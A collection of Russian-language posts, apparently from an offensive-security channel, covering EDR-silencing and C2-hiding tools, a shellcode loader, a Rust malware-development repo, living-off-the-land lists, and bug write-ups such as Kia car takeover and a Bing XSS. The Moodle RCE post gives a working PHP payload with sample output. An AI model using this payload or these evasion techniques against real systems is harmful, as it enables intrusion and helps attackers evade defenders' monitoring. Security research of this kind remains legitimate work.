EDRSilencer

EDRSilencer — "убийца EDR", как FireBlock от MdSec, но опенсорсный и бесплатный. Полностью отключает отправку каких-либо событий EDR с помощью легитимного WFP API в Windows.

Список средств защиты, которые перестанут "отстукивать":
— Microsoft Defender for Endpoint and Microsoft Defender Antivirus
— Elastic EDR
— Trellix EDR
— Qualys EDR
— SentinelOne
— Cylance
— Cybereason
— Carbon Black EDR
— Carbon Black Cloud
— Tanium
— Palo Alto Networks Traps/Cortex XDR
— FortiEDR
— Cisco Secure Endpoint (Formerly Cisco AMP)
— ESET Inspect
— Harfanglab EDR
— TrendMicro Apex One

На видео пример работы Fireblock и дампа LSASS под носом у работающего Defender.

Crack Faster, Hack Smarter: Custom Hashcat Module for Apache Shiro 1 SHA-512

Взламываем на реальном примере кастомный алгоритм хеширования с помощью собственного модуля для hashcat. Официальный Hashcat Plugin Development Guide без подробностей и обновлялся два года назад, так что лучше сохранить эту статью.

Всем привет!

Недавно разбирал по шагам всю attack.mitre.org и обнаружил интересную технику Compromise Host Software Binary T1554 , которая описывается как Adversaries may modify host software binaries to establish persistent access to systems. Это достаточно перспективный способ закрепления, явно отличающийся своей уникальностью. Помимо того, существует возможность модификации существующих файлов без порчи их цифровой подписи (например, через MST-файлы (ищите раздел "Running a signed MSI as non-admin")). Однако, я не встречал особо много статей, которые бы явно отсылали нас к этой технике.

Собственно, отсутствие материала и побудило меня написать небольшую статью на тему того, как можно инфицировать .NET-сборки :))

Так родился новый материал Карантин! Инфицируем .NET-сборки как настоящий APT .

Приятного чтения :)

RedGuard - Excellent C2 Front Flow Control tool

Умный файрволл, который скроет ваш C2 от чужих глаз.

— блокирует песочницы вендоров кибербезопасности на основе JA3 фингерпринтов и обширной базы IP-адресов
— поддерживает контроль входящего трафика для нескольких C&C серверов
— может реализовать domain fronting и осуществить балансировку нагрузки для достижения эффекта скрытности
— умеет в атрибуцию IP-адресов и блокировку по геопозиции
— способен строго проверять входящие http/s запросы на соответствие заданным malleable-профилям

bbradar.io

Я часто ловлю себя на мысли, что мне приходится тратить много сил и времени только на то, чтобы уследить за новыми программами на всех Bug Bounty площадках, где я работаю.

Последнее время меня стал раздражать этот процесс, поэтому я решил создать небольшое приложение-трекер, чтобы объединить последние общедоступные программы.

Надеюсь, это поможет вам быстрее выбрать понравившуюся программу и позволит сосредоточить всю свою энергию на реальном исследовании.

Собирает программы с площадок:
— BugBase
— CodeHawks
— HackerOne
— BugCrowd
— Intigriti
— Immunefi
— HackenProof
— YesWeHack
— Standoff365
— Code4rena
— Sherlock

Новые тоже добавляются, недавно было пополнение сайтом Remedy.

Загадки человечества:
— гибель Титаника
— Тунгусский метеорит
— Бермудский треугольник

— как работает ценообразование на C&C?!

1. Cobalt Strike + Core Impact = $12,600 user/year (базовая версия)
2. Nighthawk ($10,000) * 3 (минимальное кол-во лицензий) = $30,000 year

Сегодня список пополнился новым софтом, — 0xc2 https://www.0xc2.io/
€4,500 * 2 = €9000 year.

Выглядит так, как будто кто-то форкнул опенсорсный havoc, перекрасил иконки и выставил на продажу.

Свежее издание phrack

С момента выхода прошлого выпуска культового журнала прошло 3 года.

Release date : 2024-08-19

После нескольких последних десятилетий, когда человечество выложило все свои коллективные знания в сеть, мы видим все больше способов помешать нам получить к ним доступ. Не только хорошую информацию сложнее найти, плохая информация заглушает ее.

Растут стимулы присматривать и собирать ренту за важными ресурсами, а также распространять мусор, который в лучшем случае бесполезен, а в худшем — вреден.

Во всем этом хаосе реальная угроза — потеря полезной, проверенной и надежной информации ради монетизации противоположного.

Мы можем двигаться вперед через эту чушь. Мы можем работать вместе, чтобы поддерживать
хорошую информацию и усиливать голоса тех, кто ее создает и кураторствует. Мы можем узнать, как все на самом деле работает, делиться подробностями и использовать эти механизмы, чтобы делать что-то хорошее

— Introduction
— Phrack Prophile on BSDaemon
— Linenoise
— Loopback
— Phrack World News
— MPEG-CENC: Defective by Specification
— Bypassing CET & PAC/BTI With Functional — Oriented Programming
— World of SELECT-only PostgreSQL Injections
— A VX Adventure in Build Systems and Oldschool Techniques
— Allocating new exploits
— Reversing Dart AOT snapshots
— Finding hidden kernel modules (extrem way reborn)
— A novel page-UAF exploit strategy
— Stealth Shell: A Fully Virtualized Attack Toolchain
— Evasion by De-optimization
— Long Live Format Strings
— Calling All Hackers

https://github.com/TheWover/donut

Генератор шелл-кода и лоадер в одном флаконе.

По возможностям так:
— Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.
— Using entropy for API hashes and generation of strings.
— 128-bit symmetric encryption of files.
— Overwriting native PE headers.
— Storing native PEs in MEM_IMAGE memory.
— Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).
— Patching Event Tracing for Windows (ETW).
— Patching command line for EXE files.
— Patching exit-related API to avoid termination of host process.
— Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal, and UUID string.

Ringzer0 Training

Канал с воркшопами на разные темы.

— Initiation to Car Hacking: Discovering the CAN bus
— Compiler Backdooring For Beginners
— Rust Won't Save Us: Finding And Exploiting 0-Days In Security Appliances
— RISC V Exploit Dev Fun
— Reversing with Ghidra
— Hands-on Binary Deobfuscation
— A Journey into Malicious Code Tradecraft for Windows
— Bypassing Security Perimeters via Vulnerable Devices
— Introduction to Cryptography
— A Journey into Malicious Code Tradecraft for Windows

Ошибка Microsoft ценой в несколько тысяч долларов

Bingbot, поисковой бот от Microsoft, индексирует видео с разных сайтов: VK, Tiktok, Instagram, и Youtube, чтобы отображать их у себя в поиске.

Помимо самих видео, он парсит и их атрибуты, такие как название и описание. Если залить видео на хостинг, то бот, спустя некоторое время, получит его и начнет отдавать метадату по адресу https://www.bing.com/videos/vdasync?mid={mid}.

Эта метадата выглядит как обычный JSON, за которым, при открытии бинга, ходит браузер пользователя. Но вместо правильного applicarion/json, в ответе по этому адресу возвращается тип контента text/html; charset=utf-8.

Поэтому если в названии видео добавить полезную нагрузку с HTLM-тегами, бот ее успешно распарсит и захостит твою XSS-ку "как есть" на главном домене bing.com.

Баг был найден первого июля, а сумма выплаты составила $3000.

https://github.com/Whitecat18/Rust-for-Malware-Development/

Много примеров как писать offensive-утилиты на расте.

Содержимое
— Encryption Methods: AES/RC4/XOR
— Enumeration System
— Stomping injection
— InfoStealer
— Malware Tips: AMSI Bypass, LSASS Dump
— Persistence
— Process-Injection: Local/Remote
— Extract WiFi
— Reverse Shell
— Local/Remote Thread Hijacking
— Windows Threads
— DLL Injection
— Keylogger Dropper
— Shellcode Obfuscation and Deobfuscation
— Shellcode Execution Methods

Полезные ссылки
— Rust Book
— Windows API [old]-(winapi)
— Windows API (by Official Microsoft)
— NtAPI
— Windows Internals
— RedTeam Notes
— Malware Development Essentials
— Rust for CyberSecurity and Red Teaming

Не забываем и о предыдущих постах: как написать свой Cheat Engine на Rust, сниппеты кода для редтима.

https://github.com/projectdiscovery/tldfinder

У ICANN, организации которая координирует работу корневых DNS, существует список со всеми существующими Top Level доменами. Помимо привычных .com/.org/.net, в нем можно встретить и много необычных, о которых вы могли и не слышать, вроде .google, .gucci или .netflix, которыми управляют одноименные компании.

Вот 3 валидных примера:
— cloud.google
— design.google
— travel.google

Как говорил исследователь Jason Haddix на своем курсе Bug Hunter's Methodology Live Course:

За каждый домен .apex, который вы найдете, у вас в 4 раза больше шансов взломать цель

Чем больше TLD вы обнаружите, принадлежащих компании, тем больше вероятность того, что они содержат интересные уязвимости.

TLDFinder — новая утилита от Project Discovery и Mandiant создана специально, чтобы помочь вам в поисках таких доменов. Достаточно указать название компании, чтобы она нашла все необычные домены, которые принадлежат ей.

Использует пассивный сбор информации с сайтов Crtsh, netlas, bufferover, censys, github, dnsrepo, wayback machine.

Само исследование https://cloud.google.com/blog/topics/threat-intelligence/enumerating-private-tlds/

CVE-2024-45257

Плохая новость для любителей личных ботнетов: в byob, админке для управления агентами, нашли RCE.

Оригинальный репозиторий собрал почти 9 тысяч звезд на гитхабе, что делает этот C2 одним из самых популярных.

BYOB небезопасно сохраняет эксфильтрированные от агентов файлы. В частности, он использует функцию os.path.join, которая создает сценарии с Directory Traversal.

Вызов функции выглядит так

output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)

Благодаря параметру filename, можно указать произвольный путь и записать собственный файл в произвольное место на диске.

Вторая уязвимость — само выполнение кода, которое стало возможным благодаря передаче пользовательского ввода в функцию subprocess.Popen().

Эта функция вызывается при генерации пэйлоада, а вызов API доступен без авторизации.

Баг удалось найти тому же исследователю, который в прошлый раз обнаружил SSRF в Havoc.

SSRFing the Web with the Help of Copilot Studio

У Microsoft существует сервис Copilot Studio, чтобы создавать AI боты. В ответ на фразу можно настроить HTTP-запрос, а в качестве URL — указать внутренний хост.

Классический SSRF, но кроме IMDS (сервис с метадатой), тут получилось обратиться к внутренней Cosmos DB на чтение и запись.

Так что если ищете баги в сервисах из Azure, имейте ввиду, что к ней можно обращаться и по HTTP, чтобы сделать красивый PoC в связке с ликнутыми токенами из IMDS.

https://blog.redteam-pentesting.de/2024/moodle-rce/

RCE в системе, которую любят использовать вузы во всем мире.

1. Создать вычисляемый вопрос
2. Изменить формулу ответа на

(1)->{system($_GET[chr(97)])}

3. Сохранить
4. Добавить к URL &a=id или любую другую команду

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>

<html  dir="ltr" lang="en" xml:lang="en">
<head>
    <title>Editing a Calculated question | Test</title>
[...]

OffSec анонсировали изменения для OSCP

Первое изменение. С 1 ноября 2024 года уберут бонусные баллы, которые можно было накопить, выполнив 80% упражнений для подготовки к экзамену на портале.

Цель OffSec — использовать материалы курса и обучение для подготовки к экзамену, а не использовать материалы курса и обучение как часть экзамена.

Раньше с помощью них можно было решить 3 Linux виртуалки и сдать экзамен, игнорируя часть с Active Directory. Теперь такое не сработает.

Взамен пообещали выдать стартовые креды для AD.

Второе изменение — теперь будут выдавать 2 сертификата: OSCP и OSCP+. После того, как ты сдал экзамен, тебе выдается премиальный OSCP+, который действует три года.

Если его не продлить, происходит даунгрейд до обычного OSCP, который активен всю жизнь и который можно проапгрейдить до OSCP+, повторно решив экзамен.

Знак "+" подчеркивает приверженность учащегося непрерывному обучению и стремлению оставаться в курсе событий в постоянно развивающейся области.

Конференция KazHackStan 2024.

Смотрим записи докладов, собрал самые интересные.

День 1. OSINT
— GEWEL: A structural approach to GEOINT
— Искусство цифровых расследований: фреймворк SOWEL
— OSINT: Недооценённые Dork-запросы
— Социальные графы против киберпреступности
— Obsidian, как саппорт в osint - расследованиях

День 2. Main
— Как взломать любого гражданина Республики Казахстан
— Как защитить Managed Services от RCE
— Разработка защищенных девайсов
— Не трейсингом единым: расследование современных атак на криптокошельки
— Preventing internal data leaks
— Step by Step to BugBounty: Process, Challenges and Solutions

Information Security
— Fighting deepfakes without analyzing the image
— DeFi Exploits and Hacks: реверсим блокчейн-экслоиты
— Android Hardening: закрываем целые классы уязвимостей
— Когда домен истек: превращаем пустяки в серьезную фишинговую угрозу
— Уязвимости банковских систем

Reverse/Malware
— Применение ИИ для анализа вредоносов
— Practical application of full homomorphic encryption for confidential smart contracts and training AI models on encrypted data
— System Persistence Methods Of The STA-2201
— Developing Resilient Detections (with Obfuscation & Evasion in Mind)
— Devirtualization of a protected KoiVM object
— Hacking Process Hacker 2

День 3.
— (|(MaLDAPtive:¯\_(LDAP)_/¯=ObFUsc8t10n) (De-Obfuscation &:=De*te)(!c=tion))
— Web2.5: Pentesting blockchain
— Nuclei Fu
— Security testing of financial services
— Red Team tales: Однажды на Red Team проекте...
— RedTeam: Abusing Google to fight Google
— Бесфайловые атаки: Как злоумышленники внедряют вредоносное ПО без следов на диске

В этом году простые, но сильные баги Web Cache Deception привлекли внимание и стали одними из самых популярных, — благодаря тому, что их легко эксплуатировать и часто это криты (об одном из таких в ChatGPT я рассказывал тут).

PortSwigger не остались в стороне и написали по ним свой собственный ресерч Gotta cache 'em all: bending the rules of web cache exploitation, рассказали о своих находках на Black Hat USA 2024, и выпустили лабы, чтобы разобраться самим "что да как".

Теория
Web cache deception Overview

Web caches
— Cache keys
— Cache rules

Constructing a web cache deception attack
— Using a cache buster
— Detecting cached responses

Exploiting static extension cache rules
— Path mapping discrepancies
— Exploiting path mapping discrepancies
— Delimiter discrepancies
— Exploiting delimiter discrepancies
— Delimiter decoding discrepancies
— Exploiting delimiter decoding discrepancies

Exploiting static directory cache rules
— Normalization discrepancies
— Detecting normalization by the origin server
— Detecting normalization by the cache server
— Exploiting normalization by the origin server
— Exploiting normalization by the cache server

Exploiting file name cache rules
— Detecting normalization discrepancies
— Exploiting normalization discrepancies

Preventing web cache deception vulnerabilities

Практика
— Exploiting path mapping for web cache deception
— Exploiting path delimiters for web cache deception
— Exploiting origin server normalization for web cache deception
— Exploiting cache server normalization for web cache deception
— Exploiting exact-match cache rules for web cache deception

Баг, через который можно угнать все машины от Kia

У Kia есть приложение Connect, через которое можно узнать где находится твоя машина, посигналить, а еще открыть ее и завести. Но как оно понимает, что это твоя машина, а не чужая?

После того, как ты купил Kia, дилер дает тебе ссылку, которая линкует машину с твоей учеткой для входа в само приложение.

Ссылка с одноразовым токеном ведет на сайт дилера. На этом же сайте из JS-кода можно найти эндпоинты, через которые дилер генерит эти ссылки, а еще запросы на то, чтобы управлять машиной.

Кроме того, ты сам можешь зарегаться как дилер, — этот эндпоинт был скрыт, но его получилось найти из-за того, что сайт дилера это форк клиентского API. И читать данные о владельцах чужих машин, а еще управлять ими.

Мораль такая: если ты покупаешь такую машину, помни, что она не становится твоей на 100%. У дилера, вендора и хакеров всегда остаются возможности угнать ее удаленно.

Living Off the Living Off the Land

Сборник всех сайтов, которые посвящены "жизни за счет земли" или процессу, суть которого — заиспользовать легитимные ресурсы, чтобы особо не палиться и злоупотребить ими.

О GTFOBins и LOLBAS вы уже наверняка все знаете, но возможности выходят далеко за их пределы. Все, что перечислено ниже, можно использовать в своих атаках, — вполне успешно и скрытно.

Классический LoTL:
— LOLBAS project — Windows
— GTFOBins — Linux
— LOOBins — MacOS

Extended LoTL:
— LOLAPPS — LoTL для 3th-party приложений, таких как VS Code и Discord
— Living Off The Land Drivers — драйвера для обхода средств безопасности и проведения атак
— LOTP — неочевидный RCE-By-Design в CLI-утилитах для разработки
— HijackLibs — проверенный список кандидатов для DLL Hijacking

Администрирование и виртуализация:
— LOLRMM — утилиты удаленного мониторинга и управления
— LOLESXi — скрипты и бинари из VMware ESXi
— LOFL — тактика, позволяющая не запускать бинари на скомпрометированных машинах, о которой я писал тут

Проекты от mrd0x:
— LOTS Project — легитимные сайты для фишинга и эксфильтрации
— MalAPI.io — список WinAPI-функций для Enumeration/Injection/Evasion
— FILESEC.IO — все типы файлов, которые могут быть полезны при атаках

Blue Team:
— WTFBin — GTFOBins и LOLBAS, но для синей команды и написания правил обнаружения
— bootloaders.io — курируемый список известных бутлоадеров
— LoLCerts — фингерпринты ликнутых сертификатов для подписи приложений, которые когда-либо утекали у крупных вендоров
— LOLBins CTI-Driven — наглядный MindMap с APT и компаниями, в которых участвовали те или иные бины

Другое:
— persistence-info — полусотня способов закрепиться в Windows
— LOTHardware — "железо", которое можно использовать для Red Team
— BYOL — пару слов о LoTL от Mandiant
— WADComs — интерактивная шпаргалка с готовыми командами для атак на AD